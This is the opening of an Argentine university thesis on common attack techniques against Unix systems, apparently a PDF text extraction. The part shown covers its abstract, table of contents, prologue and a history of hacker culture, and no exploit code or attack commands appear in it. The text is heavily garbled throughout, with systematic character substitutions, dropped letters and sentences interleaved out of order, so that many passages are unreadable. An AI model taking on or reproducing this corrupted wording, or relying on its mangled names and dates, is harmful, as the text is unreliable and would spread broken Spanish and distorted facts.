Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
Universidad Nacional de Lujn Int. Ruta !" #"$$ Lujn% &uenos Aires Rep'(lica Ar)entina A*o +$$,
Esta obra est licenciada bajo una Licencia Atri(uci-n.No /omercial. /ompartir 0(ras Derivadas I)ual 2.5 Argentina de Creative Co ons. !ara ver una co"ia de esta licencia# visite $tt"%&&creativeco ons.org&licenses&b'( nc(sa&2.5&ar& o env)enos una carta a Creative Co ons# *+* ,econd ,treet# ,uite -..# ,an Francisco# Cali/ornia# 01*.5# 2,A.
1arcelo 2ernnde3 Universidad Nacional de Lujn Int. Ruta !" #"$$ Lujn% &uenos Aires Rep'(lica Ar)entina arcelo./idel./ernandez3g ail.co
"Si la depuracin es el proceso de eliminar errores, entonces la programacin debe ser el proceso de introducirlos" Edsger 4. 5ij6stra
Resumen
El "resente trabajo trata de brindar un "anora a acerca de las tcnicas s co unes de obtenci8n de in/or aci8n re ota en /or a activa ' "asiva# detecci8n de vulnerabilidades ' "osterior ente una introducci8n al ataque en entornos ti"o 2ni9# co o :inu9 ;5ebian# 2buntu# <ed =at# Fedora# ,use# Mandriva# etc.># B,5 ;FreeB,5# ?"enB,5# @etB,5># ,olaris# A7A# =!(2A# ,C? 2ni9# etc. En el !ri er Ca")tulo se $ace una reseBa de la $istoria del Movi iento =ac6er# una co unidad nueva e interconectada# surgida al junto al desarrollo de la in/or tica nuestros d)as# is o tie "o que ' is a. :uego se describen los diversos
/actores tecnol8gicos ' circunstancias adicionales que alteraron su recorrido $asta o ento en que se "odr)a decir que est en todo su es"lendor. ,eguido de esto# se describe un "oco la situaci8n global de la C,eguridad 7n/or ticaD $o' en d)a# su relaci8n con la Etica =ac6er ' la "rctica del =ac6ing Etico co o una /or a de vida dentro de la Co unidad =ac6er. En el Fercer Ca")tulo se "lantean un conjunto de eta"as co o t)"icas# o que nor al ente se llevan adelante# antes ' des"us de e/ectuar un ataque a la seguridad in/or tica de una organizaci8n# con el /in de que tenga "robabilidades de 9ito "ri ero ' "resenta la "ri era ' a9i izar las consecuencias luego. a'ores
:os ca")tulos siguientes "oseen una neta orientaci8n tcnica. El Cuarto s e9tendida /or a de reco"ilaci8n activa de in/or aci8n s re ota% el Cescaneo de "uertosD o CPort ScanningD. ,e introducen una serie de variantes o ti"os de escaneo# los cuales se encuentran en la $erra ienta que se inclu'en ca"turas del tr/ico de la red a odo de eje "lo. "o"ular# @ a"# detallando el /unciona iento te8rico ' "rctico de cada una# 'a El Ca")tulo 5 e9"lica otras /or as de reconoci iento re oto# co o ser la detecci8n de un ,iste a ?"erativo en base a su "ila de "rotocolos FC!&7!# lla ado ?, Finger"rinting# en su versiones activa# "asiva ' otras utilizadas. Fa bin se desarrollan algunas tcnicas aGn Enu eraci8n de ,ervicios ' el Finger"rinting de A"licaciones. El ,e9to Ca")tulo recorre algunas $erra ientas "ara a"licar ' a "liar aGn s la teor)a de los dos ca")tulos anteriores% @etcatH o"ciones avanzadas de @ a" co o su otor de scri"tingH "ort scanners alternativos co o 2nicornscan ' uestra de las ,canrand# ' un packet crafter co o ="ing es s8lo una in/or ticos.
77
enos
s intrusivas# co o la
"osibilidades que tienen los intrusos ;legales o no> /rente a los siste as
!or Glti o# el Ca")tulo + /inal ente describe el ataque ' acceso a un equi"o re oto# ade s de $acer una introducci8n un so/tIare es"ecial ente creado "ara el desarrollo ' creaci8n de e9"loits# lla ado Metas"loit Fra eIor6. :a utilidad del Ane9o A se reduce en tener a objetivo de re/rescar la ano la docu entaci8n s i "ortante de los "rotocolos con los que se trabaja% 7!# FC!# 25! e 7CM!# con el e oria en caso de duda o desconoci iento "or "arte del lector. El Ane9o B describe con bastante detalle ' "recisi8n las ca"turas realizadas ' utilizadas en los Ca")tulos 1 ' J. El Ane9o C se des"rende ' "ro/undiza un "oco s el Ca")tulo 5# abriendo las "uertas a la colaboraci8n con el "ro'ecto @ a" cuando no reconoce una /ir a de un ,?H de "aso# ta bin sirve co o re/erencia de bajo nivel sobre qu "ar etros son Gtiles "ara la detecci8n activa de un stac6 FC!&7! re oto. El Ane9o 5 "er ite obtener s detalles sobre los e9"loits utilizados en el Ca")tulo +. K el Ane9o E es un co "endio de los tr inos# siglas ' acr8ni os utilizados# e9"licando su signi/icado ' o/reciendo las re/erencias corres"ondientes. 4ala(ras /laves: ,eguridad# :inu9# 2ni9# ,eguridad de la 7n/or aci8n# =ac6ing# Crac6ing# E9"loits# Finger"rinting# !ort ,canning
777
A)radecimientos
Agradezco "ro/unda ente a toda la gente que grati/icante ca ino de estudiante universitario. e rode8 durante estos aBos
de estudio% /a ilia# docentes# a igos ' co "aBeros con los que recorr) el largo '
7L
5ndice de /ontenido
<esu en..........................................................................................................!g. 77 Agradeci ientos............................................................................................!g. 7L !r8logo...........................................................................................................!g. 7A Ca")tulo *. 7ntroducci8n e =istoria de los $ac6ers..........................................!g. * *.*. :os !rogra adores Cde LerdadD..........................................................!g. * *.2. :os dorados MJ. ( El co ienzo de la cultura $ac6er.............................!g. 2 *.-. :os aBos M+. N :a Cultura de las !5!(*..............................................!g. 5 *.1. A"arecen 2ni9 ' las *.5. :as inico "utadoras...............................................!g. J icroco "utadoras% Co "utadoras !ersonales..........................!g. **
*.J. :os aBos MO.# M0. ' el F:?,,............................................................!g. ** Ca")tulo 2. El Ataque de siste as in/or ticos............................................!g. *1 2.*. El @egocio de la ,eguridad en la Actualidad.....................................!g. *1 2.2. El =ac6ing Etico................................................................................!g. *1 Ca")tulo -. Eta"as F)"icas de un Ataque.......................................................!g. *+ -.*. !lani/icaci8n ' elecci8n del objetivo..................................................!g. *O -.2. ?btenci8n de in/or aci8n..................................................................!g. *O -.2.*. 5esde /uera de la organizaci8n...................................................!g. *0 -.2.2. 5esde dentro de la organizaci8n.................................................!g. 2. -.2.-. 7ngenier)a ,ocial.........................................................................!g. 2* -.-. BGsqueda ' rastreo de vulnerabilidades.............................................!g. 22 -.-.*. Acceso :ocal..............................................................................!g. 22 -.-.2. Acceso <e oto. Enu eraci8n de ,ervicios...............................!g. 2-.1. Buscando el Anoni ato en la red.......................................................!g. 2J -.1.*. <edes ' ,iste as An8ni os.......................................................!g. 2J -.1.2. 2tilizaci8n de MalIare...............................................................!g. 2+ -.5. Ataque e 7ntrusi8n..............................................................................!g. 2O -.5.*. Ma"eo de Lulnerabilidades........................................................!g. 2O -.5.2. E9"lotaci8n e intrusi8n...............................................................!g. -. -.J. !uertas traseras ' Eli inaci8n de $uellas..........................................!g. -* -.+. Atacar otro siste a.............................................................................!g. -* Ca")tulo 1. !ort ,canning..............................................................................!g. -1.*. Mtodo de Funciona iento ' ?bjetivos............................................!g. -1.2. Estados de un !uerto..........................................................................!g. -1
L
1.2.*. !uerto Abierto ;C?"en !ortD>.....................................................!g. -1 1.2.2. !uerto Cerrado ;CClosed !ortD>..................................................!g. -J 1.2.-. !uerto Filtrado o Bloqueado ;CFilteredD>...................................!g. -O 1.-. Fi"os de !ort ,canning en @Ma".......................................................!g. 1. 1.-.*. ,'n ,can.....................................................................................!g. 1* 1.-.2. Connect ,can..............................................................................!g. 12 1.-.-. Ac6 ,can.....................................................................................!g. 11 1.-.1. 4indoI ,can..............................................................................!g. 1+ 1.-.5. 25! ,can....................................................................................!g. 1+ 1.-.J. Mai on# @ull# Fin ' A as ,can................................................!g. 1O 1.-.+. 7dle ,can.....................................................................................!g. 5* 1.-.O. FF! Bounce ,can.......................................................................!g. 5O 1.-.0. Escaneo de !rotocolos 7!............................................................!g. J1 1.-.*.. Fi"os de escaneo% <esu en......................................................!g. J5 Ca")tulo 5. ?tras Fcnicas de <econoci iento Activo.................................!g. JJ 5.*. 5etecci8n del ,iste a ?"erativo% ?, Finger"rinting........................!g. JJ 5.*.*. 5etecci8n Activa........................................................................!g. JJ 5.*.2. 5etecci8n !asiva.........................................................................!g. +2 5.*.-. ?tras tcnicas de Finger"rinting.................................................!g. +5 5.2. Enu eraci8n de ,ervicios..................................................................!g. ++ 5.2.*. Banner Prabbing.........................................................................!g. ++ 5.2.2. Finger"rinting de A"licaciones...................................................!g. +0 5.2.2.*. A a"...................................................................................!g. O. 5.2.2.2. @ a"...................................................................................!g. OCa")tulo J. ,o/tIare "ara <econoci iento Activo........................................!g. O+ J.*. @etcat..................................................................................................!g. O+ J.2. @ a" N Ms ?"ciones.......................................................................!g. 02 J.2.*. 5eco's ;o C,eBuelosD>................................................................!g. 02 J.2.2. Evitando FireIalls......................................................................!g. 01 J.2.-. 7nter/az Pr/ica ( Qen a"..........................................................!g. 0J J.2.1. Motor de ,cri"ting%.....................................................................!g. 0+ J.-. 2nicornscan......................................................................................!g. *.. J.1. ,canrand...........................................................................................!g. *.2 J.5. Mani"ulaci8n de !aquetes% ="ing....................................................!g. *.5 Ca")tulo +. E9"lotaci8n de un ?bjetivo.......................................................!g. **2
L7
+.*. El !ro'ecto Metas"loit.....................................................................!g. **1 +.*.*. Esque a de Funciona iento....................................................!g. **5 +.*.2. Arquitectura ' Co "onentes....................................................!g. **+ +.*.-. 7nter/aces de 2suario................................................................!g. *2* +.2. Eje "los de Ataques con E9"loits...................................................!g. *25 +.*.*. Atacando ,a ba con Metas"loit..............................................!g. *25 +.*.2. E9"lotando un ,ervidor FF!....................................................!g. *2O +.-. Enlaces 2tiles...................................................................................!g. *-. Ane9o A. !ila de !rotocolos FC!&7!...........................................................!g. *-2 A.*. !rotocolo 7!v1 ( Encabezado..........................................................!g. *-2 A.2. !rotocolo FC! N Encabezado%.........................................................!g. *-A.-. !rotocolo 25! N Encabezado.........................................................!g. *-1 A.1. !rotocolo 7CM! N Encabezado........................................................!g. *-5 A.5. FC! N 5iagra a de Fransici8n de Estados.....................................!g. *-J Ane9o B. Acerca de las Ca"turas de Fr/ico...............................................!g. *-+ B.*. ,cri"ts "ara !rocesar las Ca"turas...................................................!g. *-+ B.2. :as Ca"turas en 5etalle...................................................................!g. *1. B.2.*. Ca"tura *% !uerto Abierto........................................................!g. *1. B.2.2. Ca"tura 2% !uerto Cerrado........................................................!g. *1* B.2.-. Ca"tura -% !uerto 25! Cerrado...............................................!g. *1* B.2.1. Ca"tura 1% !uerto Filtrado........................................................!g. *1* B.2.5. Ca"tura 5% Connect ,can..........................................................!g. *12 B.2.J. Ca"tura J% ACR ,can...............................................................!g. *12 B.2.+. Ca"tura +% ACR ,can Filtrado.................................................!g. *1B.2.O. Ca"turas O% Fin# Mai on# @ull ' A as ,cans.........................!g. *1B.2.O.* Fin ,can.............................................................................!g. *1B.2.O.2 Mai on ,can.....................................................................!g. *11 B.2.O.- @2:: ,can........................................................................!g. *11 B.2.O.1 A as ,can.........................................................................!g. *15 B.2.0. Ca"tura 0 a **% 7dle ,can.........................................................!g. *1J B.2.*.. Ca"tura *-% FF! Bounce ,can...............................................!g. *5* B.2.**. Ca"tura *1% FF! Bounce Err8neo..........................................!g. *5J B.2.*2. Ca"tura *1B% 7! !rotocol ,can..............................................!g. *50 B.2.*-. Ca"tura *5% ,K@ ,can con 5eco's.......................................!g. *JO B.2.*1. Ca"tura *J% Covert C$annel 7CM!........................................!g. *+2
L77
Ane9o C. Anlisis de una /ir a FC!&7!......................................................!g. *O5 Ane9o 5. C8digo /uente de los E9"loits 2tilizados....................................!g. *O0 Ane9o E. Plosario de Fr inos...................................................................!g. *02 Bibliogra/)a..................................................................................................!g. *05
L777
!r8logo
4r-lo)o
Este trabajo surge co o consecuencia del grn inters que tengo "or la seguridad in/or tica "or un lado ' la ad iraci8n $acia la co unidad $ac6er "or el otro. =o' en d)a# 7nternet "er ite que una gran asa de "ersonas# entusiastas de las Cnuevas tecnolog)asD# vuelquen in/or aci8n e interactGen con ella en /or a constante e ininterru "ida# gracias a los "rogra as de so/tIare. !ero la entable ente# son "ocos los que re/le9ionan que este nuevo de co unicaci8n es di/erente a los de s# "ara bien ' "ara cada vez necesitan de de /or a edio al. :os errores de
"rogra aci8n que antes s8lo "rovocaban "roble as aqu) ' all en /or a aislada# a'or cuidado# 'a que su dise inaci8n crece en /or a s so/tIare# "ara s consu idores# ' s di/)ciles de anejo global ' e9ageradaH cada vez se escribe s integrada con la red.
costear# sobrellevar ' a/rontar# ' en consecuencia# $o' e9iste todo un gran ercado global ;l)cito ' del otro> alrededor de las vulnerabilidades en el de la in/or aci8n de esa gran asa.
Es "or esto que creo que no es casual el enor e creci iento del ,o/tIare :ibre ;F:?,,> en estos Glti os aBos. ,u /unda ento en la C/iloso/)a $ac6erD# su de/ensa de los estndares abiertos# ' la de/ensa de los derec$os del usuario en el anejo de la in/or aci8n est e9"andindose co o alternativa# /rente a un odelo que co o est quedando de ostrado# tiene uc$as /allas. s co unes "ara Este trabajo es un breve recorrido de los "rocedi ientos
analizar "ri ero ' a"rovec$arse des"us de estos errores# ca ino que los $ac6ers $an sabido transitar ' desarrollar en /or a e9clusiva# con el objetivo de /o entar la inacabable cultura del conoci iento.
Aclaraci-n% :as tcnicas de ataque e9"uestos en este trabajo son s8lo una reco"ilaci8n a ?rganizaciones# Entidades ' E "resas "ueden o no contener datos ver)dicos o del cu'o caso a/ir ativo ser aclarado o"ortuna ente.
odo de
eje "lo ' no "retenden ser co "letos. :a in/or aci8n "resentada co o "roveniente de undo real# en
7A
R4 de consu o# dada a conocer clculos si "les ;su a ' resta> "or uso 7lustraci8n ilitar *>.
7lustraci8n * ( Co "utadora E@7AC
anterior# Jo$n Mauc$l' ' Jo$n !res"er Ec6ert# sta s)# dando co ienzo a una ola de aconteci ientos que ter inar)an en la co "utaci8n tal co o la conoce os.
7lustraci8n 2% :)nea de Fie "o ( !rogra adores de Lerdad * !ara dar una idea de su velocidad de clculo# un "rocesador de !C reciente ;"or eje "lo un 7ntel Core 2 Vuad de - P=Q># "uede realizar decenas de segundo. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. * de 22O iles de illones de o"eraciones "or
5ic$as
quinas eran e9cesiva ente grandes# lentas ' "esadas. :a entrada edio de tarjetas "er/oradas# que $ac)a que los centros
de c8 "utos ar aran largas CcolasD de "rogra as a ejecutarH si el "rogra a /allaba# el "rogra ador deb)a arreglar el "roble a ' volver a la CcolaD. Esto $ac)a u' burocrtico ' di/)cil el acceso real a la co "utadora# lo cual desani aba ' quitaba entusias o de utilizarlas al co Gn de los "rogra adores# cient)/icos ' acad icos. A "esar de ello# en estos "ri eros "asos de la co "utaci8n# programadores de verdad co o los creadores de la E@7AC ' la 2@7LAC# o ta bin ,e' our Cra'2# comen3aron a desarrollar una incipiente cultura propia# con ter inolog)as# que se re/lej8 "or eje "lo en varias largas listas de C:e'es de Mur"$'D S47R7UM!=KT .
aquello que les interesara# "or "ura diversi8n ' curiosidad# desde aquellas ano $asta conocer al dedillo el siste a tele/8nico del edi/icio# aGn a costa de sus relaciones sociales ' "ersonales. !ri ero con la FA(. S47R7UFA.T# ' luego ta bin en *0J*# cuando la instituci8n adquiri8 la "ri er !5!(*# dic$os estudiantes ;Bob ,aunders# !eter ,a son# Alan Roto6# ' otros># convirtieron estas quinas ' sus sucesoras de la l)nea !5! S47R7U!5!T de 5EC1 en su "asatie "o "re/erido# donde desarrollaron so/tIare# $erra ientas de "rogra aci8n# un lenguaje in/or al# "ro"io# ' "or /in# una cultura% con tica ! c-di)os# cu'a $uella deja su :a arca $asta nuestros d)as. a'or)a de los tr inos originados en esta "oca estn registrados en el
2 ,e' our Cra' ;*025(*00J> /ue un "ionero de la in/or tica# ' es considerado el C!adre de la ,u"erco "utaci8nD. !as8 su vida diseBando equi"a iento co "utacional a grandes escalas# ' es el inventor de un gran nG ero de tecnolog)as "atentadas "ara las e "resas que l trabajaba. :uego de un dese "eBo brillante en stas# /und8 Cra' Cor"oration en *0+2# la "rinci"al /ir a /abricante de su"erco "utadoras durante dos dcadas ' 1 !5! de 5EC% !rogra edia. SC<AKT S?BUC<AKT itee. - FM<C N Fec$ Model <ailroad Club# ,ignals and !oIer Co
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2 de 22O
Jargon File5 SE<JFT # un docu ento que "retende reco"ilar el signi/icado del slang# o lenguaje e9clusiva ente $ac6er. El tr ino hacker "roviene de esta eta"aH si bien original ente quiere decir Calguien quien $ace $ac$aD# se encuentra aqu) SE<JF=T descri"to co o% 7. C2na "ersona que dis/ruta e9"lorar los detalles de los siste as ' e9"ri ir sus ca"acidades# al contrario de la a'or)a de sus usuarios.D +. CAlguien que "rogra a de /or a entusiasta ;$asta obsesiva>.D ;. C2na "ersona ca"az de a"reciar el valor del $ac6eo.D <. C2na "ersona que es buena "rogra ando r"ida ente.D . C2n e9"erto en un "rogra a en "articular# o alguien que /recuente ente trabaja con l o en lH co o "or eje "lo# un Hacker UnixD. #. C2n e9"erto o entusiasta de cualquier ti"oH alguien "uede ser un $ac6er de la astrono )a# "or eje "lo.D ". CAlguien que dis/ruta el desa/)o intelectual de su"erar o sortear las li itaciones de /or a creativaD. ,. CEl tr ino acker ta bin tiende a connotar a$ora>. Co o se "uede ver# un di/undida entre la gente "or los acker nada tiene que ver con la visi8n edios s asivos de co unicaci8n# la del Cladr8n s bien relacionadas con el uso s di/usa e bres)a en la co unidad global de/inida "or la redD ;re/irindose a A<!A@et "ri ero e 7nternet uebles con un
cibernticoD# que dis/ruta ingresando a siste as sin "er iso "ara robar datos. ,i bien un $ac6er dis/ruta de $acer cosas que estn no co Gn de los siste as# o considera los l) ites legales de una /or a sus ecanis os de seguridad "ara luego
o CrelajadaD ;s8lo "orque es bueno saber todos los detalles de un siste a ' sortear ejorarlos># la intenci-n del 9ac:er no es ro(ar in=ormaci-n o causar da*o al)uno . !ara aquellos que s) lo $acen# los $ac6ers inventaron otro tr ino% cracker. !ara /inalizar# dada la de/inici8n de acker# <a' ond escribe% C=a' una co unidad# una cultura co "artida de "rogra adores e9"ertos ' agos de las redes in/or ticas que recorren la $istoria $acia atrs varias dcadas# $asta la "ri er co "utadora de tie "o co "artido ' los "ri eros e9"eri entos de la A<!A@et. :os ie bros de esta cultura dieron origen al tr ino M$ac6erM. :os $ac6ers constru'eron la 7nternet. :os $ac6ers $icieron el siste a o"erativo 2ni9
5 F$e Jargon File% El CArc$ivo de la JergaD. Fa bin deno inado CEl 5iccionario =ac6erD. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. - de 22O
lo que es $o'. :os $ac6ers ejecutaron la 2senet. :os $ac6ers $icieron la 4orld 4ide 4eb /uncionar. ,i usted es "arte de esta cultura# si usted contribu'8 a ella ' otras "ersonas en ella saben quin es usted ' lo lla an un $ac6er# entonces# usted es un $ac6er.D SE<B=T Lolviendo a esta !poca dorada de los ackers SEB=:T# $a' que re arcar que s-lo =ue movili3ada ;' $asta "osible> por nota(les cam(ios en la tecnolo)6a de la co "utaci8n. Co o se dijo anterior ente# $asta ese donde "rogra arlas era bastante tedioso# 'a que una "rogra a escrito ;en un lenguaje de o ento las co "utadoras eran utilizadas "ara ejecutar inter inables "rocesos "or lotes# )ni a equivocaci8n en el quina u' bajo nivel> $ac)a que todo el
transistorizada# una de las "ri eras con una salida en /or a de i agen SCMUFA.T> ' las "ri eras co "utadoras !5! de 5EC# todo ca bi8# 'a que estas co "utadoras "ro"on)an una o"eraci8n ms interactiva# que "od)an CtocarD ;ten)a una quina de escribir elctrica ada"tada "ara entrar datos a la quina>. As) ' todo# la e9igua cantidad de con que contaban estas ingenio "ara lograr ejores "rogra as con e oria ' ca"acidad de "rocesa iento u' "ocos recursos dis"onibles. Es as)
co o nacieron los "ri eros acks ;no olvide os que se buscaba CrecortarD o >9ac9ar? el consu o de Co o estas "ri eras e oria '&o "rocesa iento> en los "rogra as ' luego# quinas de c8 "uto# el ovi iento e inters "or el tr ino acker /ue i "onindose "or decantaci8n. ellas se e9"andi8 ' no s8lo tuvo su es"lendor en el A7:ab del M7F# sino ta bin en la 2niversidad de ,tand/ord ;,A7:J> ' en la Carnegie(Mellon+# donde se /or aron ABos s centros de cultura $ac6er e investigaci8n. s tarde# con la creaci8n de la red de co unicaciones A<!A@et
;*0J0># estos centros de investigaci8n# original ente divididos# co enzaron a uni/icarse# a tener conciencia "ro"ia ' =uncionar como una comunidad% como una >tri(u?. Esto los /ortaleci8 aGn avances tecnol8gicos "er anente ente. El interca bio de in/or aci8n# el trabajo en conjunto entre laboratorios ' universidades $izo que todo el ovi iento en s) se "otenciara en las siguientes s ' "ro/undiz8 su alcance# logrando
J ,A7:% ,tand/ord Arti/icial 7ntelligence :aborator'. + CM2% Carnegie(Mellon 2niversit'. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 1 de 22O
dcadas. Todo el so=t@are que escri(6an% el conocimiento que pose6an% todo era compartido% modi=icado ! mejorado a travs del li(re intercam(io de in=ormaci-n. Tanto el so=t@are como los conocimientos eran li(res . Fa bin dio origen a actividades lGdicas relacionadasH las "ri eras listas de c$istes# lenguaje slang# discusiones ticas# el inters "or la ciencia /icci8n# todo eso ' /loreci8 natural ente "or la red que los conectaba. s
Estas
quinas ;que no se lla aban Cco "utadorasD "orque en ese interactivas# /ueron adquiridas "or
entonces se asociaba ese tr ino con c$icas# "otentes# relativa ente baratas e
7lustraci8n -% !ri er
s co "leta.SC2=7T
Es "or esto que las !5! ' sus $ac6ers Cco"aronD la A<!A@etH siendo la cultura de la !5!(*. S!5!*.(!<MTS!5!*.(4ebT la enor edida las !5!(+ ' !5!(O>. s relevante de esa "oca ;' en
Es entonces donde los distintos ;"ero interconectados> nGcleos de actividad $ac6er ' sus !5!(*. co enzaron a interesarse "or di/erentes l)neas de
O 5EC% 5igital Equi" ent Cor"oration Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5 de 22O
El A7:ab del M7F desarroll8 un siste a o"erativo alternativo "ara el !5!( *. deno inado ITA ;7nco "atible Fi es$aring ,'ste
S47R7U7F,T>#
di/erencia del que integraba 5EC ;el F?!,(*. S47R7UF?!,*.T># ' ten)a un objetivo claro% desarrollar ' utilizar dentro del laboratorio un siste a de tie "o co "artido "ro"io# a9i izando la e/iciencia del $ardIare ' los usuariosS7F,UM7FT. Ade s de $acer las cosas Ca su /or aD# este siste a o"erativo "er iti8 que los $ac6ers del M7F desarrollaran una serie de avances sin "recedentes% el editor E acs# el lenguaje :7,!# ' innovaciones revolucionarias en el 7F, re otos# is o# uc$as s avanzado res"ecto de
otros ,iste as ?"erativos de aquel entonces# co o ,iste as de arc$ivos anejo de "rocesos so/isticado# so"orte de tie "o real # etc. Fodo este conoci iento te8rico ' trabajo de aBos /ue llevado a uc$)si os siste as# ' "er anece en uso $asta $o' en d)aH sin e bargo# el 7F, en s) estaba escrito en lenguaje de !5!(*.# ' estaba atado a su destino.
:os $ac6ers del ,A7: /ueron claves en el desarrollo de lo que $o' es la co "utadora "ersonal ' en la inter/az de so/tIare orientada a la ventana&)cono& ouse. S,A7:UM2,T En el CM2 ientras tanto# se llevaron adelante los "ri eros siste as
Fa bin /ueron i "ortantes los avances logrados "or los $ac6ers del !A<C0SA!A<C4EBT%
El
:a i "resora lser. :as redes de rea local. Muc$o s# ta bin re/erente a las co "utadoras "ersonales de $o'.
inico "utadoras
Mientras en *0J0 la A<!A@et nac)a# Ren F$o "son e "ez8 a "rogra ar "ara Bell :abs un siste a o"erativo que "oco a "oco /ue ree "lazando en cuanto a /uncionalidades al 1ultics S47R7UM2:T. El desarrollo de Multics /ue iniciado en *0J5# ' ten)a co o objetivo ser Cun sistema de computacin de tiempo
0 !A<C% !alo Alto <esearc$ Center N Aero9 7nc. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J de 22O
inico "utadoras
compartido para mainframes, robusto, interactivo, siempre en l"nea, para cual#uier finalidad, #ue pudiera soportar muc os usuarios a la ve$ D ;' /inanciaban el "ro'ecto*. no alcanz8 los objetivos deseados# ' de esa cancelado en abril de ese aBo SM2:UF7METSM2:U=7,T. El resid)a en su costo% Multics era u' altos**. Ren conoc)a bien al Multics ;/ue "arte de su equi"o de trabajo> ' si bien en "ri era instancia se "ro"uso s8lo crear un siste a de arc$ivos "ara su
*2
objetivos aGn# ver SM2:U7@F<?TSBE::T>. !ero "ara las organizaciones que anera /ue otivo de dic$a decisi8n
anejo en s
la cinta de "a"el de la !5!(+# "oco a "oco /ue i "le entando $erra ientas "ara "oder ejecutarse a s) is o# etc.
/uncionalidades "ro"ias de un siste a o"erativo co "leto% un s$ell # un editor# Cuando se le uni8 5ennis <itc$ie el "ro'ecto cobr8 i "ulso ' luego Brian Rernig$an# otro gran colaborador# le "uso el no bre Unix en clara re/erencia a la co "lejidad de Multics*- ' la "roble as. Al "oco tie "o el gru"o de desarrollo obtuvo una /la ante !5!(** S!5!**(
=BRT#
is os
de desarrollo e investigaci8n. :a "ri era versi8n de 2ni9 /ue escrita en lenguaje ensa blador# "ero la clave del gran 9ito "osterior de este siste a o"erativo se bas8 en que su c8digo /uente /ue reescrito en el lenguaje C# creado es"ec)/ica ente "ara esta tarea. 5esde que co enz8 su /abricaci8n# cada versi8n de la serie !5! tuvo di/erentes arquitecturas# juegos de instrucciones# ' di/erentes objetivos dentro del ercado. En "articular# las !5!(*. ' !5!(**# si bien sus no bres sugieren que uno era un diseBo evolutivo del otro# en realidad# eran completamente di=erentes% uno era de -J bits ' el otro de *J bits# res"ectiva ente# ' sus arquitecturas eran u' distintas. Es "or eso que la elecci8n de "ortar 2ni9 a la uc$o des"us# co o se ver s adelante. !5!(** tuvo sus consecuencias
*. Financiaban el "ro'ecto de Multics% Bell Fele"$one :abs# el !ro'ecto MAC del M7F ' el de"arta ento de co "utaci8n de Peneral Electric. ** AGn as)# Multics sigui8 siendo desarrollado# i "le entado ' utilizado "or *2 Ler Plosario% ,$ell# "g. 2*2. *- :a 2 de 2ni9 se dice que "roviene de Cuni"le9adoD o CGnicoD# en clara o"osici8n a C ulti"le9adoD de Multics S47R7UM2:T Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. + de 22O uc$os aBos s.
inico "utadoras
uc$o s de
s e9tensa que al co ienzo# un)a universidades# centros de investigaci8n ' entidades estatales de EE22H en tr inos de $ardIare# era un conjunto de *.. co "utadoras ;*** en arzo de *0++# ver 7lustraci8n 1> SA<!AUFF7T# la
a'or)a !5!(*. ' !5!(**. Fen)a varias a"licaciones ' "rotocolos estndar# co o
7lustraci8n 1% Ma"a l8gico de la A<!A@et ( Marzo de *0++ SCKBPE?T Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O de 22O
inico "utadoras
el correo electr8nico# los /oros de discusi8n ;2senet># la trans/erencia de arc$ivos ' $asta tr/ico de voz. 2ni9 /ue un suceso "orque el lenguaje C# aBos s tarde# a /ines de los M+.# 'a $ab)a sido i "le entado en in/inidad de "lata/or as ' con/iguraciones de $ardIare distintas# "or su sencillez# /le9ibilidad ' velocidad# lo cual $izo que 2ni9 is o ;a esa altura# con varios aBos de desarrollo enci a> ' el so/tIare escrito "ara l /uera posi(le ejecutarlo en todo lu)ar donde un compilador / existiese.
7lustraci8n 5% Arbol de las di/erentes versiones de 2ni9 a lo largo del tie "o S47R7U:7@T. Ler ta bin otro rbol gr/ico aGn s co "leto en S47R7U2AT
2n buen eje "lo de esto se dio a /ines de los M+.# cuando 5EC lanz8 la arquitectura BAC# que se diseBo co o e9tensi8n ' evoluci8n a -2 bits de la anterior !5!(**. F$o as B. :ondon ' Jo$n F. <eiser escribieron un docu ento al res"ectoS2ni9-2vT de donde la siguiente /rase resu e el trabajo de llevar 2ni9 a la LAA# lla ado 2ni9&-2L% C%ork on t e & compiler began in mid'(ecember
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 0 de 22O
inico "utadoras
)*++, - e ard.are arrived on /arc 0, %e eld a part1 on /a1 )* to celebrate successful multiuser operation of t e s1stem, D ;CEl trabajo en el co "ilador C co enz8 a ediados de 5icie bre de *0++. :a quina lleg8 el - de Marzo. Fuvi os una /iesta el *0 de Ma'o "ara celebrar el e9itoso /unciona iento ultiusuario del siste aD>. Eje "los co o este*1 su"usieron un gran ca bio de "aradig as en la in/or tica% todo so/tIare escrito "ara 2ni9 "odr)a correr en di/erentes "lata/or as# en cualquier lu)ar. =asta ese antes ! un despus de Unix ! el len)uaje /. o ento# el so/tIare era alta ente de"endiente de la arquitectura en la cual se ejecutaba. Es "or esto que 9u(o un
*1 El trabajo tal co o se lo describe no a"rovec$aba co "leta ente la nueva arquitectura LAA# "ero es una uestra de lo relativa ente si "le que era llevar un siste a o"erativo ' su conjunto de $erra ientas a nuevas arquitecturas. !osterior ente# en *0+0# estudiantes de la 2niversidad de Ber6ele' "ublicaron -B,5 ;B,5 "or Ber6ele' ,o/tIare 5istribution># que era una versi8n de 2ni9&-2L que a"rovec$aba co "leta ente las nuevas ca"acidades de la LAA. 5e aqu) en nivel global. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *. de 22O s# la 2niversidad de Ber6ele' /ue una de las versiones de re/erencia de 2ni9 a
Ca")tulo *. ( *.5.:as
*.5. :as
edios de al acena iento# etc.> "er iti8 que una nueva corriente de j8venes e9"ertos se interesara "or crear dis"ositivos "oderosos ' /le9ibles en el ta aBo "osible% se las deno in8 microcomputadoras "ri ero ' 9ome computers ;co "utadoras Cde casaD> o personal computers ;co "utadoras "ersonales> des"us. !equeBos clubes de /anticos ;Hobb1ists &lubs2 de la electr8nica ' co "utaci8n co enzaron a surgir# aco "aBados "or el es"acio dedicado en las "ublicaciones co o Popular 3lectronics, El Homebre. &omputer &lub
S47R7U=CCT
/ue la cuna
